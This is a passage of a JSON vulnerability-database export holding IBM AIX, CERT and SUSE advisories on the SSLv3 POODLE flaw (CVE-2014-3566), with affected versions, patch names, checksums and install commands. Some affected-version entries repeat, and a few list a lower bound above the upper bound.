"versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["7100-02-04", "7100-02-01", "7100-02-06", "7100-02-00", "7100-02-03", "7100-02-05", "7100-02-02"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.2.19", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.9.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.9.45", "productName": "vios"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["7100-03-01", "7100-03-04", "7100-03-03", "7100-03-00", "7100-03-02", "7100-03-05"], "versionGte": "7.1.3.0", "fileset": "bos.net.tcp.client", "versionLte": "7.1.3.48", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.server", "versionLte": "6.1.8.18", "productName": "vios"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["6100-09-03", "6100-09-02", "6100-09-00", "6100-09-04", "6100-09-01", "6100-09-05"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.9.48", "productName": "aix"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}, {"productVersions": ["any"], "versionGte": "6.1.0.0", "fileset": "bos.net.tcp.client", "versionLte": "6.1.8.19", "productName": "vios"}], "references": [], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Wed Jun 17 09:52:06 CDT 2015\n|Updated: Tue Mar 1 10:07:14 CST 2016 \n|Update: Modified the impacted upper level fileset for 7.1.3 \n\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc\n\n \nSecurity Bulletin: Vulnerability in SSLv3 affects ftpd, sendmail, imapd, \n and popd on AIX (CVE-2014-3566)\n\n\n===============================================================================\n\nSUMMARY:\n\n SSLv3 contains a vulnerability that has been referred to as the Padding\n Oracle On Downgraded Legacy Encryption (POODLE) attack. SSLv3 is enabled\n in ftpd, sendmail when using the sendmail_ssl binary, imapd, and popd on\n AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2014-3566\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n\n\n DESCRIPTION:\n\n Product could allow a remote attacker to obtain sensitive information,\n caused by a design error when using the SSLv3 protocol. A remote user\n with the ability to conduct a man-in-the-middle attack could exploit\n this vulnerability via a POODLE (Padding Oracle On Downgraded Legacy\n Encryption) attack to decrypt SSL sessions and access the plaintext\n of encrypted connections.\n\n\n CVSS:\n \n CVSS Base Score: 4.3\n CVSS Temporal Score: See \n http://xforce.iss.net/xforce/xfdb/97013 for the current score. \n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 6.1, 7.1\n VIOS 2.2.x\n\n The following fileset levels are vulnerable:\n \n AIX Fileset Lower Level Upper Level KEY\n --------------------------------------------------------\n bos.net.tcp.client 6.1.0.0 6.1.8.19 key_w_fs\n bos.net.tcp.client 6.1.0.0 6.1.9.48 key_w_fs\n bos.net.tcp.client 7.1.0.0 7.1.2.19 key_w_fs\n| bos.net.tcp.client 7.1.0.0 7.1.3.45 key_w_fs\n\n bos.net.tcp.server 6.1.0.0 6.1.8.18 key_w_fs\n bos.net.tcp.server 6.1.0.0 6.1.9.45 key_w_fs\n bos.net.tcp.server 7.1.0.0 7.1.2.18 key_w_fs\n bos.net.tcp.server 7.1.0.0 7.1.3.45 key_w_fs\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ------------------------------------------------------------\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.8.19(2.2.2.6)\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.9.48(2.2.3.50)\n\n bos.net.tcp.server 6.1.0.0(2.2.0.0) 6.1.8.18(2.2.2.6)\n bos.net.tcp.server 6.1.0.0(2.2.0.0) 6.1.9.45(2.2.3.50)\n\n\n Note: to find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client \n\n\n REMEDIATION:\n \n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n For ftpd:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.8 IV69768 9/30/15 SP7 key_w_apar ftpd\n 6.1.9 IV73324 12/04/15 SP6 key_w_apar ftpd\n 7.1.2 IV73319 9/30/15 SP7 key_w_apar ftpd\n 7.1.3 IV73316 2/26/16 SP6 key_w_apar ftpd\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV69768\n http://www.ibm.com/support/docview.wss?uid=isg1IV73324\n http://www.ibm.com/support/docview.wss?uid=isg1IV73319\n http://www.ibm.com/support/docview.wss?uid=isg1IV73316\n\n For sendmail:\n Please note that these only apply to the SSL-enabled\n sendmail binary, /usr/sbin/sendmail_ssl. The default\n sendmail binary, /usr/sbin/sendmail, does not use SSL and\n is therefore not vulnerable to POODLE.\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.8 IV73416 9/30/15 SP7 key_w_apar sendmail\n 6.1.9 IV73417 12/04/15 SP6 key_w_apar sendmail\n 7.1.2 IV73418 9/30/15 SP7 key_w_apar sendmail\n 7.1.3 IV73419 2/26/16 SP6 key_w_apar sendmail\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV73416\n http://www.ibm.com/support/docview.wss?uid=isg1IV73417\n http://www.ibm.com/support/docview.wss?uid=isg1IV73418\n http://www.ibm.com/support/docview.wss?uid=isg1IV73419\n\n For imapd and popd:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.8 IV73973 9/30/15 SP7 key_w_apar imapd/popd\n 6.1.9 IV73976 12/04/15 SP6 key_w_apar imapd/popd\n 7.1.2 IV73974 9/30/15 SP7 key_w_apar imapd/popd\n 7.1.3 IV73975 2/26/16 SP6 key_w_apar imapd/popd\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV73973\n http://www.ibm.com/support/docview.wss?uid=isg1IV73976\n http://www.ibm.com/support/docview.wss?uid=isg1IV73974\n http://www.ibm.com/support/docview.wss?uid=isg1IV73975\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp or\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/nettcp_fix.tar\n http://aix.software.ibm.com/aix/efixes/security/nettcp_fix.tar\n https://aix.software.ibm.com/aix/efixes/security/nettcp_fix.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n For ftpd:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.8.6 IV69768s6a.150515.epkg.Z key_w_fix ftpd\n 6.1.9.5 IV73324s5a.150515.epkg.Z key_w_fix ftpd\n 7.1.2.6 IV73319s6a.150515.epkg.Z key_w_fix ftpd\n 7.1.3.5 IV73316s5a.150515.epkg.Z key_w_fix ftpd\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.2.6 IV69768s6a.150515.epkg.Z key_w_fix ftpd\n 2.2.3.50 IV73324s5a.150515.epkg.Z key_w_fix ftpd\n\n For sendmail:\n Please note that these only apply to the SSL-enabled\n sendmail binary, /usr/sbin/sendmail_ssl. The default\n sendmail binary, /usr/sbin/sendmail, does not use SSL and\n is therefore not vulnerable to POODLE.\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.8.6 IV73416s6a.150520.epkg.Z key_w_fix sendmail\n 6.1.9.5 IV73417s5a.150520.epkg.Z key_w_fix sendmail\n 7.1.2.6 IV73418s6a.150520.epkg.Z key_w_fix sendmail\n 7.1.3.5 IV73419s5a.150520.epkg.Z key_w_fix sendmail\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.2.6 IV73416s6a.150520.epkg.Z key_w_fix sendmail\n 2.2.3.50 IV73417s5a.150520.epkg.Z key_w_fix sendmail\n\n For imapd and popd:\n \n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.8.6 IV73973s6a.150609.epkg.Z key_w_fix imapd/popd\n 6.1.9.5 IV73976s5a.150609.epkg.Z key_w_fix imapd/popd\n 7.1.2.6 IV73974s6b.150610.epkg.Z key_w_fix imapd/popd\n 7.1.3.5 IV73975s5a.150619.epkg.Z key_w_fix imapd/popd\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.2.6 IV73973s6a.150609.epkg.Z key_w_fix imapd/popd\n 2.2.3.50 IV73976s5a.150609.epkg.Z key_w_fix imapd/popd\n\n To extract the fixes from the tar file:\n\n tar xvf nettcp_fix.tar\n cd nettcp_fix\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the followng:\n\n For ftpd:\n \n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n e7abdef186219eb2b039cc19746a1914725b2018d6ff9558bd43df3fa18514fa IV69768s6a.150515.epkg.Z key_w_csum\n 9f608ce43a1d828d3414f9c02fc41358d0e9ae4dcbac4d7f549d7cc9b5a7afb4 IV73324s5a.150515.epkg.Z key_w_csum\n 89a73255f06eb6bffeb5884bfce3b1a3b97b1e4d477affb7b92c4c8a9196de75 IV73319s6a.150515.epkg.Z key_w_csum\n 4ad25780e666538604e490494d7c5b6c48b9ed71c72d9f54cecd749480851c59 IV73316s5a.150515.epkg.Z key_w_csum \n\n For sendmail:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 7083ce308673424836224cadf6e021df35bf461b66a262c2691c043748242ee9 IV73416s6a.150520.epkg.Z key_w_csum\n 638e54c7f0218f020370e261d4d4a68b355568dbf5119384c4a82c7d4b374832 IV73417s5a.150520.epkg.Z key_w_csum\n cd99a31c28acdc76d6a5c48b47c3c915cd7fd1c18b2cab1e356aed47fc7d2a97 IV73418s6a.150520.epkg.Z key_w_csum\n 21f0b58c4a5bebb91c7f531ec3f8a301ba45b991cf1bd27fd323926d28b269e9 IV73419s5a.150520.epkg.Z key_w_csum\n\n For imapd and popd:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 3e3e27c1b2b07b363423fba245047c6ddf2e94605d0d051e2d50b08bf74b2c23 IV73973s6a.150609.epkg.Z key_w_csum\n a4225da8f1fa4173e2a483dd656bdc2b5ac0fd8c68f4a1434eac05daeb1bdca9 IV73976s5a.150609.epkg.Z key_w_csum\n b2e11c499f66f09f3268626939b2037b3b6e949a2a80dc1f3551998a47d5815a IV73974s6b.150610.epkg.Z key_w_csum\n b2160ee3496e57cae7d66c480bd8c2b965e37b43564731fd799a335c00a7d11b IV73975s5a.150619.epkg.Z key_w_csum\n\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: \n http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Wed Jun 17 09:52:06 CDT 2015\n Updated: Thu Jun 18 09:48:23 CDT 2015\n Update: Corrected vulnerable 7.1.2 upper fileset levels\n Updated: Fri Jun 19 08:27:55 CDT 2015\n Update: New iFix IV73975s5a filename and checksum. iFix rebuilt with a new,\n corrected description on install but is functionally the same.\n Updated: Fri Jun 26 15:52:00 CDT 2015\n Update: Added clarification that the sendmail fixes only apply when\n using the SSL-enabled sendmail binary, /usr/sbin/sendmail_ssl\n Updated: Wed Nov 4 11:13:43 CST 2015\n Update: Specified the VIOS fixes \n| Updated: Tue Mar 1 10:07:14 CST 2016\n| Update: Modified the impacted upper level fileset for 7.1.3\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n", "edition": 2, "reporter": "CentOS Project", "published": "2015-06-17T09:52:06", "title": "Vulnerability in SSLv3 affects AIX", "type": "aix", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "aix": {"apars": []}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2016-03-01T10:07:14", "id": "NETTCP_ADVISORY.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/nettcp_advisory.asc", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cert": [{"lastseen": "2016-02-03T09:13:15", "references": ["https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://www.openssl.org/~bodo/ssl-poodle.pdf", "https://www.us-cert.gov/ncas/alerts/TA14-290A", "https://www.openssl.org/news/secadv_20141015.txt", "https://www.openssl.org/news/secadv_20141015.txt", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566", "http://cwe.mitre.org/data/definitions/327.html"], "edition": 1, "description": "### Overview\n\nMany modern TLS clients can fall back to version 3.0 of the SSL protocol, which is vulnerable to a padding-oracle attack when Cypher-block chaining (CBC) mode is used. This is commonly referred to as the \"POODLE\" (Padding Oracle On Downgraded Legacy Encryption) attack.\n\n### Description\n\n[**CWE-327**](<http://cwe.mitre.org/data/definitions/327.html>)**: Use of a Broken or Risky Cryptographic Algorithm** \\- CVE-2014-3566 \n\nMultiple implementations of SSL 3.0, including the implementation in OpenSSL up to version 1.0.1i, support the use of CBC mode. However, SSL 3.0 is vulnerable to a padding-oracle attack when CBC mode is used. A successful padding-oracle attack can provide an attacker with cleartext information from the encrypted communications. \n \nAdditionally, many modern TLS clients still support the ability to fall back to the SSL 3.0 protocol in order to communicate with legacy servers. A man-in-the-middle attacker may be able to force the protocol version negotiation sequence to downgrade to SSL 3.0, thereby opening up the opportunity to exploit the padding-oracle attack. \n \nFor more information, please refer to the original [security advisory](<https://www.openssl.org/~bodo/ssl-poodle.pdf>)[](<https://www.openssl.org/~bodo/ssl-poodle.pdf>). \n \n--- \n \n### Impact\n\nAn adjacent, unauthenticated attacker may be able to derive cleartext information from communications that utilize the SSL 3.0 protocol with CBC mode. \n \n--- \n \n### Solution\n\nOpenSSL [has fixed](<https://www.openssl.org/news/secadv_20141015.txt>) the issue in OpenSSL versions 1.0.1j, 1.0.0o, and 0.9.8zc. For other implementations of the protocol, please check with the appropriate maintainer or vendor to determine if the implementation is affected by this issue. Additionally, consider the following workaround: \n \n--- \n \n**Use TLS_FALLBACK_SCSV** \n \nIf disabling SSL 3.0 is not possible, TLS client and server implementations should make use of the [TLS_FALLBACK_SCSV](<https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00>) cipher suite value to prevent man-in-the-middle attackers from forcing unnecessary protocol downgrades. \n \n--- \n \n### Vendor Information \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nApple Inc.| | -| 17 Oct 2014 \nAruba Networks, Inc.| | 17 Oct 2014| 20 Oct 2014 \nAttachmate| | 17 Oct 2014| 27 Oct 2014 \nMicrosoft Corporation| | 17 Oct 2014| 21 Jan 2015 \nMozilla| | -| 17 Oct 2014 \nNEC Corporation| | -| 28 Oct 2014 \nNovell, Inc.| | -| 27 Oct 2014 \nOpenSSL| | -| 17 Oct 2014 \nSUSE Linux| | -| 27 Oct 2014 \nLegion of the Bouncy Castle| | 17 Oct 2014| 20 Oct 2014 \nPeerSec Networks| | 17 Oct 2014| 20 Oct 2014 \nApache-SSL| | 17 Oct 2014| 17 Oct 2014 \nApache HTTP Server Project| | 17 Oct 2014| 17 Oct 2014 \nBotan| | 17 Oct 2014| 17 Oct 2014 \nCerticom| | 17 Oct 2014| 17 Oct 2014 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23577193 Vendor Status Inquiry>). \n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 4.3 | AV:N/AC:M/Au:N/C:P/I:N/A:N \nTemporal | 3.6 | E:F/RL:OF/RC:C \nEnvironmental | 3.6 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n### References\n\n * <https://www.openssl.org/~bodo/ssl-poodle.pdf>\n * <https://www.openssl.org/news/secadv_20141015.txt>\n * <https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-00>\n * <https://www.us-cert.gov/ncas/alerts/TA14-290A>\n\n### Credit\n\nThis document was written by Todd Lewellen.\n\n### Other Information\n\n * CVE IDs: [CVE-2014-3566](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566>)\n * Date Public: 14 Oct 2014\n * Date First Published: 17 Oct 2014\n * Date Last Updated: 21 Jan 2015\n * Document Revision: 28\n\n", "reporter": "CERT", "published": "2014-10-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "POODLE vulnerability in SSL 3.0", "type": "cert", "bulletinFamily": "info", "cvelist": ["CVE-2014-3566", "CVE-2014-3566", "CVE-2014-3566"], "modified": "2015-01-21T00:00:00", "href": "https://www.kb.cert.org/vuls/id/577193", "id": "VU:577193", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "suse": [{"lastseen": "2016-09-04T11:28:41", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901757", "http://download.suse.com/patch/finder/?keywords=607ea368d0c29e0c7f5f3a31b17fddd9"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "1.4-1.35.1", "arch": "noarch", "packageFilename": "suseRegister-1.4-1.35.1.noarch.rpm", "packageName": "suseRegister", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "1.4-1.35.1", "arch": "noarch", "packageFilename": "suseRegister-1.4-1.35.1.noarch.rpm", "packageName": "suseRegister", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "1.4-1.35.1", "arch": "noarch", "packageFilename": "suseRegister-1.4-1.35.1.noarch.rpm", "packageName": "suseRegister", "operator": "lt"}], "description": "suseRegister was updated to fix one security issue:\n\n * POODLE: Ensure that only TLS is used. (CVE-2014-3566)\n\n Security Issues:\n\n * CVE-2014-3566\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>>\n\n", "edition": 1, "reporter": "Suse", "published": "2015-01-05T21:04:43", "title": "Security update for suseRegister (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2015-01-05T21:04:43", "id": "SUSE-SU-2015:0010-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00000.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-04T12:46:50", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "https://bugzilla.suse.com/show_bug.cgi?id=901277", 